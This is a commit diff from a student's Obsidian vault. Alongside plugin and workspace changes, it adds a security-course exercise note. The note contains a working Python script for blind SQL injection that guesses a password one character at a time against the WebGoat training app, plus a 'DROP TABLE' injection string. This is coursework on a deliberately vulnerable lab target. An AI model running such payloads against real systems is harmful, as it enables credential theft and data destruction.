vault backup: 2023-04-17 11:35:04

.obsidian/community-plugins.json

@@ -1,19 +1,23 @@
 [
-  "obsidian-livesync",
+  "obsidian-git",
-  "obsidian-excalidraw-plugin",
+  "obsidian-mind-map",
   "table-editor-obsidian",
   "calendar",
-  "code-block-copy",
+  "obsidian-advanced-slides",
-  "obsidian-dictionary-plugin",
-  "obsidian-dynamic-toc",
   "cm-editor-syntax-highlight-obsidian",
-  "obsidian-excel-to-markdown-table",
+  "code-block-copy",
-  "juggl",
-  "obsidian-languagetool-plugin",
-  "obsidian-mind-map",
-  "nldates-obsidian",
-  "obsidian-git",
   "url-into-selection",
+  "obsidian-dictionary-plugin",
+  "obsidian-languagetool-plugin",
+  "obsidian-image-toolkit",
   "quick-latex",
-  "obsidian-plugin-toc"
+  "obsidian-excel-to-markdown-table",
+  "obsidian-icons-plugin",
+  "juggl",
+  "obsidian-plugin-toc",
+  "drawio-obsidian",
+  "obsidian-completr",
+  "execute-code",
+  "nldates-obsidian",
+  "obsidian-livesync"
 ]

.obsidian/plugins/obsidian-completr/scanned_words.txt

@@ -3881,7 +3881,6 @@ DXL
 Daten
 Datenbank
 DROP
-Drawing
 xU
 xM
 xK
@@ -4841,8 +4840,6 @@ prA
 pdfTeX
 phone
 praktisch
-plugin
-parsed
 Ic
 IT
 Ir
@@ -5236,7 +5233,6 @@ and
 aktuelle
 access
 alles
-aaaaaaaaaaaaaaa
 fb
 fVVvD
 fh
@@ -5947,7 +5943,6 @@ exestierende
 eine
 einem
 egal
-excalidraw
 tj
 tg
 tt
@@ -6174,9 +6169,6 @@ tJWLG
 true
 tabelle
 test
-tags
-the
-this
 JFRO
 JG
 JL
@@ -6752,7 +6744,6 @@ EZw
 EUj
 EuQ
 Employee
-EXCALIDRAW
 lX
 ll
 lC
@@ -8322,7 +8313,6 @@ MNG
 MiNi
 Myl
 ModDate
-MORE
 qO
 qj
 qG
@@ -9111,7 +9101,6 @@ mma
 mKt
 mkb
 mDK
-menu
 dg
 dw
 de
@@ -9337,7 +9326,6 @@ das
 dafür
 dass
 den
-document
 VV
 VA
 Vsm
@@ -9550,7 +9538,6 @@ VHCh
 VbL
 Version
 Verändert
-VIEW
 SGN
 Sg
 SrEHO
@@ -9769,7 +9756,6 @@ SET
 Sales
 Struktur
 Smith
-Switch
 rn
 rE
 rD
@@ -10324,7 +10310,6 @@ OKh
 OdD
 OFV
 OQyO
-OPTIONS
 cgl
 cj
 content

.obsidian/workspace.json

@@ -15,7 +15,7 @@
               "type": "markdown",
               "state": {
                 "file": "Informationssicherheit/Ueb2/Ueb2.md",
-                "mode": "source",
+                "mode": "preview",
                 "source": false
               }
             }

Informationssicherheit/Ueb2/Ueb2.md

@@ -96,3 +96,47 @@ Smith'; DROP TABLE access_log; --
 
 ### 2 
 
+```python
+import json  
+import requests  
+  
+def sql_injection_advance_5():  
+     alphabet_index = 0  
+     alphabet = 'abcdefghijklmnopqrstuvwxyz'  
+     password_index = 0  
+     password = ''  
+  
+     headers = {  
+        'Cookie': COOKIE,  
+     }  
+  
+     while True:  
+         payload = 'tom\' AND substring(password,{},1)=\'{}'.format(password_index + 1, alphabet[alphabet_index])  
+  
+         data = {  
+             'username_reg': payload,  
+             'email_reg': 'a@a',  
+             'password_reg': 'a',  
+             'confirm_password_reg': 'a'  
+         }  
+  
+         r = requests.put('http://HOST:PORT/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data)  
+  
+         try:  
+             response = json.loads(r.text)  
+         except:  
+             print("Wrong JSESSIONID, find it by looking at your requests once logged in.")  
+             return  
+  
+         if "already exists please try to register with a different username" not in response['feedback']:  
+             alphabet_index += 1  
+             if alphabet_index > len(alphabet) - 1:  
+                 return  
+         else:  
+             password += alphabet[alphabet_index]  
+             print(password)  
+             alphabet_index = 0  
+             password_index += 1  
+  
+sql_injection_advance_5()
+```